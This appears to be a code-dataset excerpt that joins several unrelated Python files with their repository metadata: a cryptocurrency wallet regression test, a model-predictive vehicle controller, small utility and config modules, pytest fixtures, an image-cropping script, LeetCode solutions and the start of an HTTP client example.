# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = float(utxo["amount"])
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 500)
assert_equal(self.nodes[2].getbalance("from1"), 500-21)
# Send 10 BTC normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('0.001') / 1000
self.nodes[2].settxfee(float(fee_per_byte * 1000))
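# settxfee takes a fee rate per kilobyte, so the per-byte figure above is
# scaled by 1000 before being handed to the node.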
txid = self.nodes[2].sendtoaddress(address, 10, "", "")
fee = self.nodes[2].gettransaction(txid)["fee"]
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal = self.nodes[2].getbalance()
#node_2_bal = self.check_fee_amount(balance, Decimal(balance - fee), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('10'))
# Send 10 BTC with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 10, "", "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance() - fee, node_2_bal)
node_0_bal = self.nodes[0].getbalance()
assert_equal(node_0_bal, Decimal('20'))
# Sendmany 10 BTC
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_0_bal += Decimal('10')
node_2_bal -= Decimal('10')
#node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('10'), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 10 BTC with subtract fee from amount
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "")
self.nodes[2].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
#node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('10'), fee_per_byte, self.get_vsize(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
sync_mempools(self.nodes[0:2])
self.start_node(3)
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
#relayed = self.nodes[0].resendwallettransactions()
#assert_equal(set(relayed), {txid1, txid2})
#sync_mempools(self.nodes)
#assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 1)
assert_equal(self.nodes[0].getunconfirmedbalance(), 1)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 49.998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
assert_raises_rpc_error(-25, "", self.nodes[1].sendrawtransaction, signedRawTx['hex'])
self.sync_all([self.nodes[0:3]])
self.nodes[1].generate(1) #mine a block
self.sync_all([self.nodes[0:3]])
#unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
#found = False
#for uTx in unspentTxs:
# if uTx['txid'] == zeroValueTxid:
# found = True
# assert_equal(uTx['amount'], Decimal('0'))
#assert(found)
#do some -walletbroadcast tests
self.stop_nodes()
self.start_node(0, ["-walletbroadcast=0"])
self.start_node(1, ["-walletbroadcast=0"])
self.start_node(2, ["-walletbroadcast=0"])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all([self.nodes[0:3]])
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3)) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all([self.nodes[0:3]])
node_2_bal += 2
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
#restart the nodes with -walletbroadcast=1
self.stop_nodes()
self.start_node(0)
self.start_node(1)
self.start_node(2)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes[0:3])
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:3])
node_2_bal += 2
# tx should be added to the balance because after restarting the nodes the tx should be broadcast
assert_equal(self.nodes[2].getbalance(), node_2_bal + (fee * 3))
# This will raise an exception since generate does not accept a string
assert_raises_rpc_error(-1, "not an integer", self.nodes[0].generate, "2")
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all([self.nodes[0:3]])
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
listunspent = self.nodes[1].listunspent(1, 9999999, [], 3)
assert_array_result(listunspent,
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
#check if wallet or blochchain maintenance changes the balance
self.sync_all([self.nodes[0:3]])
blocks = self.nodes[0].generate(2)
self.sync_all([self.nodes[0:3]])
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
#'-salvagewallet',
]
chainlimit = 6
for m in maintenance:
self.log.info("check " + m)
self.stop_nodes()
# set lower ancestor limit for later
self.start_node(0, [m, "-limitancestorcount="+str(chainlimit)])
self.start_node(1, [m, "-limitancestorcount="+str(chainlimit)])
self.start_node(2, [m, "-limitancestorcount="+str(chainlimit)])
if m == '-reindex':
# reindex will leave rpc warm up "early"; Wait for it to finish
wait_until(lambda: [block_count] * 3 == [self.nodes[i].getblockcount() for i in range(3)])
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
if __name__ == '__main__':
WalletTest().main()
| 44.934375 | 170 | 0.635023 |
4a2259b126b8242be28484e3c2efa79be4496c66 | 15,053 | py | Python | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 18 | 2020-10-16T00:38:55.000Z | 2022-03-03T06:01:49.000Z | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 20 | 2020-07-23T03:50:50.000Z | 2021-11-09T04:00:26.000Z | ROAR/control_module/mpc_controller.py | RyanC1681/RCAI1122 | c9683110b58c255a7a78d880ff73df7ff2329405 | [
"Apache-2.0"
] | 140 | 2019-11-20T22:46:02.000Z | 2022-03-29T13:26:17.000Z | # References:
# https://github.com/asap-report/carla/blob/racetrack/PythonClient/racetrack
# /model_predictive_control.py
import logging
import numpy as np
import pandas as pd
import random
import sympy as sym
from pathlib import Path
from scipy.interpolate import splprep, splev
from scipy.optimize import minimize
from sympy.tensor.array import derive_by_array
from ROAR.control_module.controller import Controller
from ROAR.utilities_module.vehicle_models import VehicleControl, Vehicle
from ROAR.utilities_module.data_structures_models import Transform
from ROAR.agent_module.agent import Agent
class _EqualityConstraints(object):
"""Class for storing equality constraints in the MPC."""
def __init__(self, N, state_vars):
self.dict = {}
for symbol in state_vars:
self.dict[symbol] = N * [None]
def __getitem__(self, key):
return self.dict[key]
def __setitem__(self, key, value):
self.dict[key] = value
class VehicleMPCController(Controller):
def __init__(self,
agent: Agent,
route_file_path: Path, # read in route
target_speed=float("inf"),
steps_ahead=10,
max_throttle=1,
max_steering=1,
dt=0.1):
super().__init__(agent=agent)
self.logger = logging.getLogger(__name__)
# Read in route file
self.track_DF = pd.read_csv(route_file_path, header=None)
# Fit the route to a curve
spline_points = 10000
self.pts_2D = self.track_DF.loc[:, [0, 1]].values
tck, u = splprep(self.pts_2D.T, u=None, s=2.0, per=1, k=3)
u_new = np.linspace(u.min(), u.max(), spline_points)
x_new, y_new = splev(u_new, tck, der=0)
self.pts_2D = np.c_[x_new, y_new]
# Modified parm
self.prev_cte = 0
self.target_speed = target_speed
self.state_vars = ('x', 'y', 'v', 'ψ', 'cte', 'eψ')
self.steps_ahead = steps_ahead
self.dt = dt
# Cost function coefficients
self.cte_coeff = 100 # 100
self.epsi_coeff = 100 # 100
self.speed_coeff = 0.4 # 0.2
self.acc_coeff = 1 # 1
self.steer_coeff = 0.1 # 0.1
self.consec_acc_coeff = 50
self.consec_steer_coeff = 50
# Front wheel L
self.Lf = 2.5
# How the polynomial fitting the desired curve is fitted
self.steps_poly = 30 # modify to 3 when using 3D data
self.poly_degree = 3
# Bounds for the optimizer
self.bounds = (
6 * self.steps_ahead * [(None, None)]
+ self.steps_ahead * [(0, max_throttle)] # throttle bounds
+ self.steps_ahead * [(-max_steering, max_steering)]
# steer bounds
)
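# The decision vector seen by the optimizer stacks the six state arrays
# (x, y, ψ, v, cte, eψ), each steps_ahead long and unbounded, followed by
# steps_ahead throttle values and steps_ahead steering values.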
# State 0 placeholder
num_vars = (len(
self.state_vars) + 2) # State variables and two actuators
self.state0 = np.zeros(self.steps_ahead * num_vars)
# Lambdify and minimize stuff
self.evaluator = 'numpy'
self.tolerance = 1
self.cost_func, self.cost_grad_func, self.constr_funcs = \
self.get_func_constraints_and_bounds()
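# The symbolic cost, its gradient and the equality constraints are built
# once with sympy and lambdified into plain numpy callables, so each
# control step only has to run the numeric SLSQP solve.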
# To keep the previous state
self.steer = 0
self.throttle = 0
self.logger.debug("MPC Controller initiated")
# self.logger.debug(f" cost_func: {self.cost_func}")
# self.logger.debug(f" cost_grad_func: {self.cost_grad_func}")
# self.logger.debug(f" constr_funcs: {self.constr_funcs}")
def run_in_series(self, next_waypoint: Transform) -> VehicleControl:
super(VehicleMPCController, self).run_in_series(next_waypoint)
# get vehicle location (x, y)
# location = self.vehicle.transform.location
location = self.agent.vehicle.transform.location
x, y = location.x, location.y
# get vehicle rotation
# rotation = self.vehicle.transform.rotation
rotation = self.agent.vehicle.transform.rotation
ψ = rotation.yaw / 180 * np.pi # convert degrees into radians
cos_ψ = np.cos(ψ)
sin_ψ = np.sin(ψ)
# get vehicle speed
# v = Vehicle.get_speed(self.vehicle)
v = Vehicle.get_speed(self.agent.vehicle)
# get next waypoint location
wx, wy = next_waypoint.location.x, next_waypoint.location.y
# debug logging
# self.logger.debug(f"car location: ({x}, {y})")
# self.logger.debug(f"car ψ: {ψ}")
# self.logger.debug(f"car speed: {v}")
# self.logger.debug(f"next waypoint: ({wx}, {wy})")
### 3D ###
# get the index of next waypoint
# waypoint_index = self.get_closest_waypoint_index_3D(location,
# next_waypoint.location)
# # find more waypoints index to fit a polynomial
# waypoint_index_shifted = waypoint_index - 2
# indeces = waypoint_index_shifted + self.steps_poly * np.arange(
# self.poly_degree + 1)
# indeces = indeces % self.track_DF.shape[0]
# # get waypoints for polynomial fitting
# pts = np.array([[self.track_DF.iloc[i][0], self.track_DF.iloc[i][
# 1]] for i in indeces])
### 2D ###
index_2D = self.get_closest_waypoint_index_2D(location,
next_waypoint.location)
index_2D_shifted = index_2D - 5
indeces_2D = index_2D_shifted + self.steps_poly * np.arange(
self.poly_degree + 1)
indeces_2D = indeces_2D % self.pts_2D.shape[0]
pts = self.pts_2D[indeces_2D]
# self.logger.debug(f'\nwaypoint index:\n {index_2D}')
# self.logger.debug(f'\nindeces:\n {indeces_2D}')
# transform waypoints from world coordinates into the car's coordinate frame
pts_car = VehicleMPCController.transform_into_cars_coordinate_system(
pts,
x,
y,
cos_ψ,
sin_ψ
)
# fit the polynomial
poly = np.polyfit(pts_car[:, 0], pts_car[:, 1], self.poly_degree)
# Debug
# self.logger.debug(f'\nwaypoint index:\n {waypoint_index}')
# self.logger.debug(f'\nindeces:\n {indeces}')
# self.logger.debug(f'\npts for poly_fit:\n {pts}')
# self.logger.debug(f'\npts_car:\n {pts_car}')
###########
cte = poly[-1]
eψ = -np.arctan(poly[-2])
init = (0, 0, 0, v, cte, eψ, *poly)
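# The optimization is posed in the car's own frame (the waypoints were
# shifted and rotated above), so the initial x, y and heading are zero and
# only speed, cross-track error and heading error carry real state.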
self.state0 = self.get_state0(v, cte, eψ, self.steer, self.throttle,
poly)
result = self.minimize_cost(self.bounds, self.state0, init)
# self.steer = -0.6 * cte - 5.5 * (cte - self.prev_cte)
# self.prev_cte = cte
# self.throttle = VehicleMPCController.clip_throttle(self.throttle,
# v, self.target_speed)
control = VehicleControl()
if 'success' in result.message:
self.steer = result.x[-self.steps_ahead]
self.throttle = result.x[-2 * self.steps_ahead]
else:
self.logger.debug('Unsuccessful optimization')
control.steering = self.steer
control.throttle = self.throttle
return control
def get_func_constraints_and_bounds(self):
"""
Defines MPC's cost function and constraints.
"""
# Polynomial coefficients will also be symbolic variables
poly = self.create_array_of_symbols('poly', self.poly_degree + 1)
# Initialize the initial state
x_init = sym.symbols('x_init')
y_init = sym.symbols('y_init')
ψ_init = sym.symbols('ψ_init')
v_init = sym.symbols('v_init')
cte_init = sym.symbols('cte_init')
eψ_init = sym.symbols('eψ_init')
init = (x_init, y_init, ψ_init, v_init, cte_init, eψ_init)
# State variables
x = self.create_array_of_symbols('x', self.steps_ahead)
y = self.create_array_of_symbols('y', self.steps_ahead)
ψ = self.create_array_of_symbols('ψ', self.steps_ahead)
v = self.create_array_of_symbols('v', self.steps_ahead)
cte = self.create_array_of_symbols('cte', self.steps_ahead)
eψ = self.create_array_of_symbols('eψ', self.steps_ahead)
# Actuators
a = self.create_array_of_symbols('a', self.steps_ahead)
δ = self.create_array_of_symbols('δ', self.steps_ahead)
vars_ = (
# Symbolic arrays (but NOT actuators)
*x, *y, *ψ, *v, *cte, *eψ,
# Symbolic arrays (actuators)
*a, *δ,
)
cost = 0
for t in range(self.steps_ahead):
cost += (
# Reference state penalties
self.cte_coeff * cte[t] ** 2
+ self.epsi_coeff * eψ[t] ** 2
+ self.speed_coeff * (v[t] - self.target_speed) ** 2
# Actuator penalties
+ self.acc_coeff * a[t] ** 2
+ self.steer_coeff * δ[t] ** 2
)
# Penalty for differences in consecutive actuators
for t in range(self.steps_ahead - 1):
cost += (
self.consec_acc_coeff * (a[t + 1] - a[t]) ** 2
+ self.consec_steer_coeff * (δ[t + 1] - δ[t]) ** 2
)
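# Taken together, the two loops above assemble a quadratic objective:
#   J = Σ_t [ cte_coeff·cte_t² + epsi_coeff·eψ_t² + speed_coeff·(v_t − target_speed)²
#             + acc_coeff·a_t² + steer_coeff·δ_t² ]
#     + Σ_t [ consec_acc_coeff·(a_{t+1} − a_t)² + consec_steer_coeff·(δ_{t+1} − δ_t)² ]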
# Initialize constraints
eq_constr = _EqualityConstraints(self.steps_ahead, self.state_vars)
eq_constr['x'][0] = x[0] - x_init
eq_constr['y'][0] = y[0] - y_init
eq_constr['ψ'][0] = ψ[0] - ψ_init
eq_constr['v'][0] = v[0] - v_init
eq_constr['cte'][0] = cte[0] - cte_init
eq_constr['eψ'][0] = eψ[0] - eψ_init
for t in range(1, self.steps_ahead):
curve = sum(
poly[-(i + 1)] * x[t - 1] ** i for i in range(len(poly)))
# The desired ψ is equal to the derivative of the polynomial
# curve at
# point x[t-1]
ψdes = sum(poly[-(i + 1)] * i * x[t - 1] ** (i - 1) for i in
range(1, len(poly)))
eq_constr['x'][t] = x[t] - (
x[t - 1] + v[t - 1] * sym.cos(ψ[t - 1]) * self.dt)
eq_constr['y'][t] = y[t] - (
y[t - 1] + v[t - 1] * sym.sin(ψ[t - 1]) * self.dt)
eq_constr['ψ'][t] = ψ[t] - (
ψ[t - 1] - v[t - 1] * δ[t - 1] / self.Lf * self.dt)
eq_constr['v'][t] = v[t] - (v[t - 1] + a[t - 1] * self.dt)
eq_constr['cte'][t] = cte[t] - (
curve - y[t - 1] + v[t - 1] * sym.sin(
eψ[t - 1]) * self.dt)
eq_constr['eψ'][t] = eψ[t] - (ψ[t - 1] - ψdes - v[t - 1] * δ[
t - 1] / self.Lf * self.dt)
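# The constraints above encode a kinematic bicycle model stepped with a
# simple Euler integration:
#   x_t   = x_{t-1} + v_{t-1}·cos(ψ_{t-1})·dt
#   y_t   = y_{t-1} + v_{t-1}·sin(ψ_{t-1})·dt
#   ψ_t   = ψ_{t-1} − v_{t-1}·δ_{t-1}/Lf·dt
#   v_t   = v_{t-1} + a_{t-1}·dt
#   cte_t = f(x_{t-1}) − y_{t-1} + v_{t-1}·sin(eψ_{t-1})·dt
#   eψ_t  = ψ_{t-1} − ψdes_{t-1} − v_{t-1}·δ_{t-1}/Lf·dt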
# Generate actual functions from
cost_func = self.generate_fun(cost, vars_, init, poly)
cost_grad_func = self.generate_grad(cost, vars_, init, poly)
constr_funcs = []
for symbol in self.state_vars:
for t in range(self.steps_ahead):
func = self.generate_fun(eq_constr[symbol][t], vars_, init,
poly)
grad_func = self.generate_grad(eq_constr[symbol][t], vars_,
init, poly)
constr_funcs.append(
{'type': 'eq', 'fun': func, 'jac': grad_func,
'args': None},
)
return cost_func, cost_grad_func, constr_funcs
def generate_fun(self, symb_fun, vars_, init, poly):
"""
Generates a function of the form `fun(x, *args)`
"""
args = init + poly
return sym.lambdify((vars_, *args), symb_fun, self.evaluator)
def generate_grad(self, symb_fun, vars_, init, poly):
"""
Generates the gradient of the symbolic expression `symb_fun` with respect
to the optimization variables, returned as a function of the form
`grad(x, *args)`.
"""
args = init + poly
return sym.lambdify(
(vars_, *args),
derive_by_array(symb_fun, vars_ + args)[:len(vars_)],
self.evaluator
)
def get_state0(self, v, cte, epsi, a, delta, poly):
a = a or 0
delta = delta or 0
x = np.linspace(0, 1, self.steps_ahead)
y = np.polyval(poly, x)
psi = 0
self.state0[:self.steps_ahead] = x
self.state0[self.steps_ahead:2 * self.steps_ahead] = y
self.state0[2 * self.steps_ahead:3 * self.steps_ahead] = psi
self.state0[3 * self.steps_ahead:4 * self.steps_ahead] = v
self.state0[4 * self.steps_ahead:5 * self.steps_ahead] = cte
self.state0[5 * self.steps_ahead:6 * self.steps_ahead] = epsi
self.state0[6 * self.steps_ahead:7 * self.steps_ahead] = a
self.state0[7 * self.steps_ahead:8 * self.steps_ahead] = delta
return self.state0
def minimize_cost(self, bounds, x0, init):
for constr_func in self.constr_funcs:
constr_func['args'] = init
return minimize(
fun=self.cost_func,
x0=x0,
args=init,
jac=self.cost_grad_func,
bounds=bounds,
constraints=self.constr_funcs,
method='SLSQP',
tol=self.tolerance,
)
def get_closest_waypoint_index_3D(self, car_location, waypoint_location):
"""Get the index of the closest waypoint in self.track_DF
car_location: current car location
waypoint_location: next_waypoint
"""
index = self.track_DF.loc[(self.track_DF[0] == waypoint_location.x)
& (self.track_DF[
1] == waypoint_location.y)].index
if len(index) > 0:
return index[0]
else:
location_arr = np.array([
car_location.x,
car_location.y,
car_location.z,
])
dists = np.linalg.norm(self.track_DF - location_arr, axis=1)
return np.argmin(dists)
def get_closest_waypoint_index_2D(self, car_location, waypoint_location):
"""Get the index of the closest waypoint in self.pts_2D
Note: it may return a wrong index where the route overlaps itself
"""
location_arr = np.array([
car_location.x,
car_location.y
])
dists = np.linalg.norm(self.pts_2D - location_arr, axis=1)
return np.argmin(dists)
@staticmethod
def create_array_of_symbols(str_symbol, N):
return sym.symbols('{symbol}0:{N}'.format(symbol=str_symbol, N=N))
@staticmethod
def transform_into_cars_coordinate_system(pts, x, y, cos_ψ, sin_ψ):
diff = (pts - [x, y])
pts_car = np.zeros_like(diff)
pts_car[:, 0] = cos_ψ * diff[:, 0] + sin_ψ * diff[:, 1]
pts_car[:, 1] = sin_ψ * diff[:, 0] - cos_ψ * diff[:, 1]
return pts_car
@staticmethod
def clip_throttle(throttle, curr_speed, target_speed):
return np.clip(
throttle - 0.01 * (curr_speed - target_speed),
0.4,
0.9
)
| 36.804401 | 77 | 0.558095 |
4a2259c12397fcbfe2aec9fa7ba9fa424dc96457 | 48 | py | Python | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 3 | 2015-09-10T15:18:53.000Z | 2016-06-18T14:12:36.000Z | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 2 | 2020-05-28T11:08:30.000Z | 2021-03-31T18:40:30.000Z | wikitables/__init__.py | AlexImmer/WikitablesToTriples | 5d86489483ca32d19fc11c48707b671fb9dbfcb1 | [
"MIT"
] | 1 | 2020-01-29T09:20:11.000Z | 2020-01-29T09:20:11.000Z | from .page import Page
from .table import Table
| 16 | 24 | 0.791667 |
4a225afe7fa62e4f02d032e68a96825610ae27a7 | 844 | py | Python | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | 1 | 2020-08-06T16:54:55.000Z | 2020-08-06T16:54:55.000Z | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | 77 | 2020-09-03T09:05:10.000Z | 2022-03-17T10:04:09.000Z | settings/constants.py | spirovskib/proto_app | 3051d89e636286a1aeb2bb815e890ac6ff920582 | [
"MIT"
] | null | null | null |
# File Validation for the Attachments
"""
* valid_extensions - list containing allowed file extensions. Example: ['.pdf', '.jpg']
* valid_mime_types - list containing allowed content_types. Example: ['application/pdf', 'image/jpeg']
* max_size - a number indicating the maximum file size allowed for upload.
2.5MB - 2621440
5MB - 5242880
10MB - 10485760
20MB - 20971520
50MB - 52428800
100MB - 104857600
250MB - 262144000
500MB - 524288000
"""
VALID_FILE_EXTENSIONS = ['.pdf']
MAX_FILE_SIZE = 5242880 # 5 MB of file size max
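# For reference, the sizes above are binary megabytes: 5 MB = 5 * 1024 * 1024 = 5242880 bytes.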
VALID_MIME_TYPES = ['application/pdf']
# File Validation for the Attachments
# Image Upload Resize Width
# Resize height is calculated in the view during resize
MAX_RESIZE_WIDTH = 800 # max image of 800x600
MAX_RESIZE_HEIGHT = 600 # max image of 800x600
# Image Upload Resize Width
| 30.142857 | 102 | 0.728673 |
4a225c855191c0d64b279524c5d97f542e2ed5af | 1,738 | py | Python | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | 10 | 2016-09-14T22:00:02.000Z | 2019-01-28T21:58:42.000Z | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | null | null | null | test/conftest.py | chadrik/txaio | a99d2c82aac2abea5172bfd661324b6c5bd1a4ab | [
"MIT"
] | null | null | null | import pytest
# here's a little voodoo -- any generic tests depend on this 'framework'
# fixture, which (sneakily using internal-only APIs) ensures that each
# tests runs twice: once enabled for Twisted and once enabled for
# asyncio.
#
# ...but there's a catch: not all environments support both, so we
# catch ImportError and skip those tests.
#
# To write a test that only works on one or the other framework, use
# the framework_tx or framework_aio fixtures instead
@pytest.fixture(
params=['twisted', 'asyncio'],
)
def framework(request):
"""
This is a framework that uses txaio internals to set up a
framework to use, as the 'official' way is to call .use_twisted()
or .use_asyncio() -- but we want to test with both frameworks if
they're available.
"""
try:
if request.param == 'twisted':
return framework_tx()
elif request.param == 'asyncio':
return framework_aio()
except ImportError:
pytest.skip()
@pytest.fixture
def framework_uninitialized():
import txaio
from txaio import _unframework
txaio._use_framework(_unframework)
txaio._explicit_framework = None
return _unframework
@pytest.fixture
def framework_tx():
try:
import txaio
from txaio import tx
tx._loggers = set()
txaio._use_framework(tx)
txaio._explicit_framework = 'twisted'
return tx
except ImportError:
pytest.skip()
@pytest.fixture
def framework_aio():
try:
import txaio
from txaio import aio
aio._loggers = set()
txaio._use_framework(aio)
txaio._explicit_framework = 'asyncio'
return aio
except ImportError:
pytest.skip()
| 25.558824 | 72 | 0.665708 |
4a225cdfadeae0dacb1354c2e8e826ad47fb0bb5 | 635 | py | Python | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | 8 | 2021-09-15T15:17:38.000Z | 2022-03-18T14:11:58.000Z | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | null | null | null | predict/eye_cropper_fake.py | antonin-lfv/Deep-PoC | fa216c2255ed898c78e0e1334b835cc8232e1a28 | [
"MIT"
] | 2 | 2021-09-16T14:22:45.000Z | 2021-09-20T18:55:05.000Z | from PIL import Image
import PIL
from os import listdir
from os.path import isfile, join
##fake
mypath = './face_fake_predict/'
folder_save = './eye_corpped_fake_predict/'
left = 287
top = 440
right = left + 450
bottom = top + 100
def get_all_file():
file_list = [mypath + f for f in listdir(mypath) if ('.jpeg' in f)]
file_list.sort()
return (file_list)
def crop_image(path):
print(path)
im = Image.open(path)
im = im.crop((left, top, right, bottom))
path = path.split("/")
im.save(folder_save + path[-1])
image_list = get_all_file()
print(image_list)
for i in image_list:
crop_image(str(i)) | 20.483871 | 71 | 0.672441 |
4a225d35fd7aeb0b44ad803dcaca2fdb51f0d8e9 | 685 | py | Python | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | Nov-2021-Leetcode-Challenge/single_numbers_iii.py | smsrikanthreddy/Data-Structures-and-Algorithms | ce588112f128510df3108ce671bb4864d35ee301 | [
"Apache-2.0"
] | null | null | null | class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
dict_val = {}
result1 = []
result2 = []
for val in nums:
dict_val[val] = dict_val.get(val, 0) + 1
if dict_val[val] > 1:
result1.append(val)
else:
result2.append(val)
return set(result2)-set(result1)
class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
dict_val = {}
result1 = []
result2 = []
for val in nums:
dict_val[val] = dict_val.get(val, 0) + 1
return [k for k, v in sorted(dict_val.items(), key=lambda item: item[1])][:2]
| 29.782609 | 85 | 0.510949 |
4a225daf881b4e60b1ee50ce5dd32bca4c0927e4 | 1,272 | py | Python | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | ee250/lab08/http_client_example.py | lyashley/GrovePi-EE250 | d337d6c5dea7f9c1548d75e6ac3f66e7883e315d | [
"MIT"
] | null | null | null | import requests
import json
from datetime import datetime
import time
"""This file illustrates the typical calls you need from an http client.
More specifically, in your signal_processing.py code, you should have a
request.post() call everytime a movement is classified by your algorithm."""
if __name__ == '__main__':
# This header sets the HTTP request's mimetype to `application/json`. This
# means the payload of the HTTP message will be formatted as a json ojbect
hdr = {
'Content-Type': 'application/json',
'Authorization': None #not using HTTP secure
}
